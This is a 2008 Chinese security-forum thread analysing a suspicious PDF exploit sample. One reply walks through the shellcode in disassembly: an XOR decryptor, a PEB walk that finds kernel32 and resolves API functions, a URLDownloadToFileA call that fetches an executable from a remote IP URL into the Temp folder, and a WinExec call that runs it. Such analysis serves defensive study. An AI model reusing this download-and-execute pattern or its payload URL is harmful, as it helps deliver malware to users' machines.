收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 PDFExpl+召唤
123
返回列表 发新帖
楼主: qianwenxiang
 收起左侧

[可疑文件] PDFExpl+召唤

[复制链接]
qianwenxiang
 楼主| 发表于 2008-11-16 15:42:01 | 显示全部楼层
edi=0040414A (hello.0040414A), ASCII "http://79.135.167.18/cgi-bin/index.cgi?fc413c500100f07002123510f6067317db1d02b55afdb30001080400000000170"
我汗 终于调戏到了...QuickTime...
回复

举报

fireworld
发表于 2008-11-16 15:43:44 | 显示全部楼层
shellcodes


(1) xor  解密代码 密钥0EE 加密代码长度190
virtual address = ebp = 0x40400f + 0x14 = 00404023
File offset = 00000A23

0040400A    E8 00000000     call    0040400F                        
0040400F    5D              pop     ebp
00404010    83C5 14         add     ebp, 14                          ; ebp+0x14处
00404013    B9 90010000     mov     ecx, 190
00404018    B0 EE           mov     al, 0EE
0040401A    3045 00         xor     byte ptr [ebp], al
0040401D    45              inc     ebp
0040401E    49              dec     ecx
0040401F  ^\75 F9           jnz     short 0040401A           


(2)获取kernel32.dll的baseaddresss,从而获取的shellcode感兴趣的函数LoadLibraryA等
00404030    5F              pop     edi
00404031    64:A1 30000000  mov     eax, dword ptr fs:[30]           ; peb
00404037    78 0C           js      short 00404045
00404039    8B40 0C         mov     eax, dword ptr [eax+C]           ; peb_ldr_data
0040403C    8B70 1C         mov     esi, dword ptr [eax+1C]          ;  peb_ldr_data.initializationordermoudlelist
0040403F    AD              lods    dword ptr [esi]
00404040    8B68 08         mov     ebp, dword ptr [eax+8]           ; dllbase of  kernel32.dll

EAX 7C801D77 kernel32.LoadLibraryA
EAX 7C86114D kernel32.WinExec
EAX 7C81CAA2 kernel32.ExitProcess
EAX 7C8221CF kernel32.GetTempPathA


(3) LoadLibraryA加载urlmon.dll通过URLDownloadToFileA下载病毒文件到临时文件夹

eax = lpfncb = null
eax = dwreserved = zero
ebx = szfilename = C:\DOCUME~1\xx\LOCALS~1\Temp\XjNs.exe  下载的文件保存的地址
edi = szurl = http://79.135.167.18/cgi-bin/index.cgi? fc413c500100f07002123510f6067317db1d02b55afdb300010804000000001700 从这个链接下载病毒
eax = pcaller = null


004040C6    50              push    eax
004040C7    50              push    eax
004040C8    53              push    ebx
004040C9    57              push    edi
004040CA    50              push    eax
004040CB    FF56 10         call    dword ptr [esi+10]               ;  urlmon.URLDownloadToFileA


EAX 00000000
ECX 00000000
EDX 00404145 ASCII "XjNs"
EBX 0012FEB8 ASCII "C:\DOCUME~1\terry\LOCALS~1\Temp\XjNs.exe"
ESP 0012FE9C
EBP 004041B2 hello.004041B2
ESI 00404131 hello.00404131
EDI 0040414A ASCII "http://79.135.167.18/cgi-bin/index.cgi? fc413c500100f07002123510f6067317db1d02b55afdb300010804000000001700"

(4)运行病毒文件 winexec XjNs.exe,然后退出

004040D3    6A 01           push    1
004040D5    53              push    ebx
004040D6    FF56 04         call    dword ptr [esi+4]                ; kernel32.WinExec

评分

参与人数 1经验 +10 人气 +1 收起 理由
qianwenxiang + 10 + 1 感谢解答: )

查看全部评分

回复

举报

IllusionWing
发表于 2008-11-16 15:52:02 | 显示全部楼层
我知道怎么破解了。应该是俩俩置换吧?
回复

举报

poincarelei
发表于 2008-11-19 18:59:16 | 显示全部楼层
cannot down?
回复

举报

poincarelei
发表于 2008-11-19 19:09:31 | 显示全部楼层
can download.
tips:
chanage first asm code to CC
回复

举报

123
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-7-15 16:50 , Processed in 0.104373 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表